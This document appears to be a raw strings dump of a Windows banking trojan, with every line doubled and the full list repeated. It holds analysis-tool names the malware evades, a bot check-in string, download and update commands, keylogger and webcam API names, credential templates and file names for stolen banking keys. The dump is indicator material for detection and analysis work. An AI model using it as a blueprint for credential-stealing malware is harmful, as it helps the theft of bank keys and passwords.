monkey1

monkey1

password

password

Pname.key

Pname.key

\secrets.key

\secrets.key

kernel32.dll

kernel32.dll

\explorer.exe

\explorer.exe

user32.dll

user32.dll

multi_pot.exe

multi_pot.exe

HookExplorer.exe

HookExplorer.exe

proc_analyzer.exe

proc_analyzer.exe

sckTool.exe

sckTool.exe

sniff_hit.exe

sniff_hit.exe

sysAnalyzer.exe

sysAnalyzer.exe

idag.exe

idag.exe

ollydbg.exe

ollydbg.exe

dumpcap.exe

dumpcap.exe

wireshark.exe

wireshark.exe

avp.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

%s!%s!X

sysinfo.log

sysinfo.log

scr.jpg

scr.jpg

minidump.bin

minidump.bin

%d.%d.%d.%d

%d.%d.%d.%d

Ý %dh %dm

Ý %dh %dm

%s:%d

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

Software\Microsoft\Internet Explorer\TypedURLs

url%i

url%i

4.8.14

4.8.14

%dx%d@%d

%dx%d@%d

%c%d:d

%c%d:d

{Windows directory:

{Windows directory:

links.log

links.log

\History.IE5\index.dat

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

\Opera\Opera\typed_history.xml

avast.com

avast.com

93.191.13.100

93.191.13.100

drweb

drweb

eset.com

eset.com

z-oleg.com

z-oleg.com

kltest.org.ru

kltest.org.ru

.comodo.com

.comodo.com

google.com

google.com

Dnsapi.dll

Dnsapi.dll

ws2_32.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

/search.php

Winmm.dll

Winmm.dll

Kernel32.dll

Kernel32.dll

Gdi32.dll

Gdi32.dll

ntdll.dll

ntdll.dll

hXXp://

hXXp://

hXXps://

hXXps://

HTTP/1.

HTTP/1.

nspr4.dll

nspr4.dll

PR_OpenTCPSocket

PR_OpenTCPSocket

[[[URL: %s

[[[URL: %s

Process: %s

Process: %s

User-agent: %s]]]

User-agent: %s]]]

{{{%s

{{{%s

Crypt32.dll

Crypt32.dll

CertVerifyCertificateChainPolicy

CertVerifyCertificateChainPolicy

Wininet.dll

Wininet.dll

HttpSendRequestA

HttpSendRequestA

HttpSendRequestW

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestExW

set_url

set_url

microsoft.public.win32.programmer.kernel

microsoft.public.win32.programmer.kernel

\iexplore.exe

\iexplore.exe

\firefox.exe

\firefox.exe

keygrab

keygrab

u.jpg

u.jpg

IprivLibEx.dll

IprivLibEx.dll

\\.\PhysicalDrive%u

\\.\PhysicalDrive%u

/topic.php

/topic.php

keylog.txt

keylog.txt

sniff.log

sniff.log

passwords.txt

passwords.txt

%s%u.zip

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.bing.com

VVV.microsoft.com

VVV.microsoft.com

frd.exe

frd.exe

command=config&update_url=

command=config&update_url=

&port=

&port=

command=load&url=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\chrome.exe

\svchost.exe

\svchost.exe

\opera.exe

\opera.exe

\cbmain.ex

\cbmain.ex

\iscc.exe

\iscc.exe

\clmain.exe

\clmain.exe

\wclnt.exe

\wclnt.exe

internal_wutex_0xx

internal_wutex_0xx

%s.dbf

%s.dbf

%s.DBF

%s.DBF

pop2://%s:%s@%s:%i

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

PTF://anonymous:

AUTHINFO PASS

AUTHINFO PASS

j_password=

j_password=

pass.log

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edClientLogin=

edUserLogin=

edUserLogin=

edPassword=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

&LOGIN_AUTHORIZATION_CODE=

login=

login=

password=

password=

pass_

pass_

ssleay32.dll

ssleay32.dll

advapi32.dll

advapi32.dll

path.txt

path.txt

keys.zip

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

keys

private.txt

private.txt

public.txt

public.txt

\*.key

\*.key

\self.cer

\self.cer

self.cer

self.cer

self.pub

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.exe

ctunnel.zip

ctunnel.zip

path_ctunnel.txt

path_ctunnel.txt

header.key

header.key

keys99

keys99

\header.key

\header.key

masks2.key

masks2.key

\masks2.key

\masks2.key

masks.key

masks.key

\masks.key

\masks.key

\name.key

\name.key

primary2.key

primary2.key

\primary2.key

\primary2.key

primary.key

primary.key

\primary.key

\primary.key

keys99.zip

keys99.zip

path99.txt

path99.txt

bsi.dll

bsi.dll

&domain=letitbit.net&

&domain=letitbit.net&

cc.txt

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

prv_key.pfx

keys\

keys\

sign.cer

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

sks2xyz.dll

vb_pfx_import

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

secret.key

pubkeys.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

path1.txt

inter.zip

inter.zip

interpro.ini

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

FilialRCon.dll

ISClient.cfg

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

Agava_Client.exe

KeysDiskPath

KeysDiskPath

Agava_Client.ini

Agava_Client.ini

Agava_keys

Agava_keys

keys_path.txt

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

mespro.dll

AddPSEPrivateKeyEx

AddPSEPrivateKeyEx

core.exe

core.exe

data\id.dbf

data\id.dbf

\data\id.dbf

\data\id.dbf

keys%i.zip

keys%i.zip

path%i.txt

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

winmm.dll

1.2.5

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

%s\%s

#webcam

#webcam

#webcam%d

#webcam%d

RFB d.d

RFB d.d

%s (%s)

%s (%s)

d/d/d d:d

d/d/d d:d

password check failed!

password check failed!

WinSCard.dll

WinSCard.dll

SensApi.dll

SensApi.dll

GetTcpTable

GetTcpTable

IPHLPAPI.DLL

IPHLPAPI.DLL

dbghelp.dll

dbghelp.dll

PSAPI.DLL

PSAPI.DLL

NETAPI32.dll

NETAPI32.dll

DNSAPI.dll

DNSAPI.dll

HttpQueryInfoA

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestA

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

SHFileOperationA

SHFileOperationA

SHELL32.dll

SHELL32.dll

SHLWAPI.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetSystemWindowsDirectoryA

WinExec

WinExec

SetThreadExecutionState

SetThreadExecutionState

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

GetKeyboardState

GetKeyboardState

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetKeyboardLayoutList

GetAsyncKeyState

GetAsyncKeyState

GetKeyboardLayout

GetKeyboardLayout

MapVirtualKeyW

MapVirtualKeyW

VkKeyScanW

VkKeyScanW

VkKeyScanExW

VkKeyScanExW

keybd_event

keybd_event

EnumChildWindows

EnumChildWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

SetKeyboardState

SetKeyboardState

USER32.dll

USER32.dll

SetViewportOrgEx

SetViewportOrgEx

GetViewportOrgEx

GetViewportOrgEx

GDI32.dll

GDI32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

RegFlushKey

RegFlushKey

RegNotifyChangeKeyValue

RegNotifyChangeKeyValue

RegDeleteKeyA

RegDeleteKeyA

RegEnumKeyExA

RegEnumKeyExA

RegOpenKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegQueryInfoKeyW

RegEnumKeyExW

RegEnumKeyExW

ADVAPI32.dll

ADVAPI32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

gdiplus.dll

gdiplus.dll

MSVCRT.dll

MSVCRT.dll

AVICAP32.dll

AVICAP32.dll

MSVFW32.dll

MSVFW32.dll

ShellExecuteW

ShellExecuteW

GetProcessHeap

GetProcessHeap

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

;3 #>6.&

;3 #>6.&

'2, / 0&7!4-)1#

'2, / 0&7!4-)1#

5`6C6Q6}6

5`6C6Q6}6

55

55

;";,;6;

;";,;6;

6&7-737

6&7-737

3"33393>3}3

3"33393>3}3

;#;);/;=;

;#;);/;=;

=}=

=}=

:(:-:8:=:

:(:-:8:=:

7#7)7/7=7

7#7)7/7=7

9&9,929@9

9&9,929@9

0!02090>0

0!02090>0

>$>*>4>9>

>$>*>4>9>

Windows Explorer

Windows Explorer

mavast.com

mavast.com

ya.ru

ya.ru

serverkey.dat

serverkey.dat

\windows\

\windows\

dntdll.dll

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

iexplore.exe

HighMemoryEvent_x

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

MSCTF.Shared.MUTEX.x

.Prev

.Prev

.current

.current

Explorer.EXE_1572_rwx_02060000_000B8000:

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

http

http

PASSu98V

PASSu98V

PASSu08V

PASSu08V

FTPQ

FTPQ

12345678

12345678

password1

password1

monkey

monkey

monkey1

monkey1

password

password

Pname.key

Pname.key

\secrets.key

\secrets.key

kernel32.dll

kernel32.dll

\explorer.exe

\explorer.exe

user32.dll

user32.dll

multi_pot.exe

multi_pot.exe

HookExplorer.exe

HookExplorer.exe

proc_analyzer.exe

proc_analyzer.exe

sckTool.exe

sckTool.exe

sniff_hit.exe

sniff_hit.exe

sysAnalyzer.exe

sysAnalyzer.exe

idag.exe

idag.exe

ollydbg.exe

ollydbg.exe

dumpcap.exe

dumpcap.exe

wireshark.exe

wireshark.exe

avp.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

%s!%s!X

sysinfo.log

sysinfo.log

scr.jpg

scr.jpg

minidump.bin

minidump.bin

%d.%d.%d.%d

%d.%d.%d.%d

Ý %dh %dm

Ý %dh %dm

%s:%d

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

Software\Microsoft\Internet Explorer\TypedURLs

url%i

url%i

4.8.14

4.8.14

%dx%d@%d

%dx%d@%d

%c%d:d

%c%d:d

{Windows directory:

{Windows directory:

links.log

links.log

\History.IE5\index.dat

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

\Opera\Opera\typed_history.xml

avast.com

avast.com

93.191.13.100

93.191.13.100

drweb

drweb

eset.com

eset.com

z-oleg.com

z-oleg.com

kltest.org.ru

kltest.org.ru

.comodo.com

.comodo.com

google.com

google.com

Dnsapi.dll

Dnsapi.dll

ws2_32.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

/search.php

Winmm.dll

Winmm.dll

Kernel32.dll

Kernel32.dll

Gdi32.dll

Gdi32.dll

ntdll.dll

ntdll.dll

hXXp://

hXXp://

hXXps://

hXXps://

HTTP/1.

HTTP/1.

nspr4.dll

nspr4.dll

PR_OpenTCPSocket

PR_OpenTCPSocket

[[[URL: %s

[[[URL: %s

Process: %s

Process: %s

User-agent: %s]]]

User-agent: %s]]]

{{{%s

{{{%s

Crypt32.dll

Crypt32.dll

CertVerifyCertificateChainPolicy

CertVerifyCertificateChainPolicy

Wininet.dll

Wininet.dll

HttpSendRequestA

HttpSendRequestA

HttpSendRequestW

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestExW

set_url

set_url

microsoft.public.win32.programmer.kernel

microsoft.public.win32.programmer.kernel

\iexplore.exe

\iexplore.exe

\firefox.exe

\firefox.exe

keygrab

keygrab

u.jpg

u.jpg

IprivLibEx.dll

IprivLibEx.dll

\\.\PhysicalDrive%u

\\.\PhysicalDrive%u

/topic.php

/topic.php

keylog.txt

keylog.txt

sniff.log

sniff.log

passwords.txt

passwords.txt

%s%u.zip

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.bing.com

VVV.microsoft.com

VVV.microsoft.com

frd.exe

frd.exe

command=config&update_url=

command=config&update_url=

&port=

&port=

command=load&url=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\chrome.exe

\svchost.exe

\svchost.exe

\opera.exe

\opera.exe

\cbmain.ex

\cbmain.ex

\iscc.exe

\iscc.exe

\clmain.exe

\clmain.exe

\wclnt.exe

\wclnt.exe

internal_wutex_0xx

internal_wutex_0xx

%s.dbf

%s.dbf

%s.DBF

%s.DBF

pop2://%s:%s@%s:%i

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

PTF://anonymous:

AUTHINFO PASS

AUTHINFO PASS

j_password=

j_password=

pass.log

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edClientLogin=

edUserLogin=

edUserLogin=

edPassword=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

&LOGIN_AUTHORIZATION_CODE=

login=

login=

password=

password=

pass_

pass_

ssleay32.dll

ssleay32.dll

advapi32.dll

advapi32.dll

path.txt

path.txt

keys.zip

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

keys

private.txt

private.txt

public.txt

public.txt

\*.key

\*.key

\self.cer

\self.cer

self.cer

self.cer

self.pub

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.exe

ctunnel.zip

ctunnel.zip

path_ctunnel.txt

path_ctunnel.txt

header.key

header.key

keys99

keys99

\header.key

\header.key

masks2.key

masks2.key

\masks2.key

\masks2.key

masks.key

masks.key

\masks.key

\masks.key

\name.key

\name.key

primary2.key

primary2.key

\primary2.key

\primary2.key

primary.key

primary.key

\primary.key

\primary.key

keys99.zip

keys99.zip

path99.txt

path99.txt

bsi.dll

bsi.dll

&domain=letitbit.net&

&domain=letitbit.net&

cc.txt

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

prv_key.pfx

keys\

keys\

sign.cer

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

sks2xyz.dll

vb_pfx_import

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

secret.key

pubkeys.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

path1.txt

inter.zip

inter.zip

interpro.ini

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

FilialRCon.dll

ISClient.cfg

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

Agava_Client.exe

KeysDiskPath

KeysDiskPath

Agava_Client.ini

Agava_Client.ini

Agava_keys

Agava_keys

keys_path.txt

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

mespro.dll

AddPSEPrivateKeyEx

AddPSEPrivateKeyEx

core.exe

core.exe

data\id.dbf

data\id.dbf

\data\id.dbf

\data\id.dbf

keys%i.zip

keys%i.zip

path%i.txt

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

winmm.dll

1.2.5

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

%s\%s

#webcam

#webcam

#webcam%d

#webcam%d

RFB d.d

RFB d.d

%s (%s)

%s (%s)

d/d/d d:d

d/d/d d:d

password check failed!

password check failed!

WinSCard.dll

WinSCard.dll

SensApi.dll

SensApi.dll

GetTcpTable

GetTcpTable

IPHLPAPI.DLL

IPHLPAPI.DLL

dbghelp.dll

dbghelp.dll

PSAPI.DLL

PSAPI.DLL

NETAPI32.dll

NETAPI32.dll

DNSAPI.dll

DNSAPI.dll

HttpQueryInfoA

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestA

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

SHFileOperationA

SHFileOperationA

SHELL32.dll

SHELL32.dll

SHLWAPI.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetSystemWindowsDirectoryA

WinExec

WinExec

SetThreadExecutionState

SetThreadExecutionState

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

GetKeyboardState

GetKeyboardState

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetKeyboardLayoutList

GetAsyncKeyState

GetAsyncKeyState

GetKeyboardLayout

GetKeyboardLayout

MapVirtualKeyW

MapVirtualKeyW

VkKeyScanW

VkKeyScanW

VkKeyScanExW

VkKeyScanExW

keybd_event

keybd_event

EnumChildWindows

EnumChildWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

SetKeyboardState

SetKeyboardState

USER32.dll

USER32.dll

SetViewportOrgEx

SetViewportOrgEx

GetViewportOrgEx

GetViewportOrgEx

GDI32.dll

GDI32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

RegFlushKey

RegFlushKey

RegNotifyChangeKeyValue

RegNotifyChangeKeyValue

RegDeleteKeyA

RegDeleteKeyA

RegEnumKeyExA

RegEnumKeyExA

RegOpenKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegQueryInfoKeyW

RegEnumKeyExW

RegEnumKeyExW

ADVAPI32.dll

ADVAPI32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

gdiplus.dll

gdiplus.dll

MSVCRT.dll

MSVCRT.dll

AVICAP32.dll

AVICAP32.dll

MSVFW32.dll

MSVFW32.dll

ShellExecuteW

ShellExecuteW

GetProcessHeap

GetProcessHeap

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

;3 #>6.&

;3 #>6.&

'2, / 0&7!4-)1#

'2, / 0&7!4-)1#

SYSTEM!XP10!F9BE9A8A

SYSTEM!XP10!F9BE9A8A

%WinDir%\apppatch\jsvlax.exe

%WinDir%\apppatch\jsvlax.exe

%Documents and Settings%\%current user%\Application Data\

%Documents and Settings%\%current user%\Application Data\

5`6C6Q6}6

5`6C6Q6}6

55

55

;";,;6;

;";,;6;

6&7-737

6&7-737

3"33393>3}3

3"33393>3}3

;#;);/;=;

;#;);/;=;

=}=

=}=

:(:-:8:=:

:(:-:8:=:

7#7)7/7=7

7#7)7/7=7

9&9,929@9

9&9,929@9

0!02090>0

0!02090>0

>$>*>4>9>

>$>*>4>9>

`.data

`.data

Windows Explorer

Windows Explorer

mavast.com

mavast.com

ya.ru

ya.ru

serverkey.dat

serverkey.dat

\windows\

\windows\

dntdll.dll

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

